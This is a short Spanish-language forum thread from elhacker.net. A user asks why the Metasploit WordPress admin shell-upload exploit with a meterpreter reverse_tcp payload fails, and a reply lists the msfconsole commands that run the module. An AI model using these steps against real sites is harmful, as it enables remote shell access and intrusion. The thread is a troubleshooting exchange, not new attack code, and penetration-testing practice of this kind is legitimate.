elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Exploit para wordpress
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Exploit para wordpress  (Leído 1,210 veces)
k4rv

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Exploit para wordpress
« en: 12 Abril 2018, 22:11 »

Muy buenas a todos, lo primero de todo saludaros pues soy nuevo. (y como suele ocurrir siempre nos solemos animar por dudas)
Creo que no me equivoco de hilo..no soy experto.

El problema que tengo es un exploit para wordpress "unix/webapp/wp_admin_shell_upload", en el cual dentro de sus opciones tengo la validación "ok" de usuario administrador pero al cargar payload tengo problemas y me sale lo siguiente:

  • Started reverse TCP handler on 192.168.138.145:4444
  • Authenticating with WordPress using admin:admin...
  • Authenticated with WordPress
  • Preparing payload...
  • Uploading payload...
[-] Exploit aborted due to failure: unexpected-reply: Failed to upload the payload
  • Exploit completed, but no session was created.


En este intento concretamente lo intente con el payload: "php/meterpreter/reverse_tcp"
pero tambien lo intente con otros y el mismo resultado.
He desactivado el firewall por si acaso.

Alomejor es problema de vulnerabilidad pero no estoy seguro.

Mil gracias de antemano
Saludos
En línea

Shell Root
Colaborador
***
Desconectado Desconectado

Mensajes: 3.882


Khan


Ver Perfil WWW
Re: Exploit para wordpress
« Respuesta #1 en: 12 Abril 2018, 22:35 »

Código
  1. msf > use exploit/unix/webapp/wp_admin_shell_upload
  2. msf exploit(wp_admin_shell_upload) > show targets
  3. ...targets...
  4. msf exploit(wp_admin_shell_upload) > set TARGET <target-id>
  5. msf exploit(wp_admin_shell_upload) > show options
  6. ...show and set options...
  7. msf exploit(wp_admin_shell_upload) > exploit

:https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_admin_shell_upload
En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
k4rv

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: Exploit para wordpress
« Respuesta #2 en: 13 Abril 2018, 08:49 »

Esta tarde le doy más vueltas según tu respuesta.

Muchas gracias ;)
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Exploit apache, para que me serviria este exploit?? aqui teneis el codigo en C
Bugs y Exploits
SoieRZaPa 9 3,851 Último mensaje 5 Febrero 2005, 04:28
por heap
Exploit PHP para wordpress
Nivel Web
TapIt 1 1,771 Último mensaje 21 Noviembre 2012, 06:35
por ~ Yoya ~
[WordPress] ¿ Cómo añadir una entrada en WordPress 3.8.2 ?
Desarrollo Web
0x5d 3 1,151 Último mensaje 12 Abril 2014, 06:47
por 0x5d
Buscador para wordpress
Desarrollo Web
;c1v!c 0 577 Último mensaje 15 Abril 2014, 20:11
por ;c1v!c
Este exploit camufla un javascript en plugins sociales de blogs con WordPress...
Noticias
wolfbcn 0 313 Último mensaje 21 Abril 2016, 15:04
por wolfbcn
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines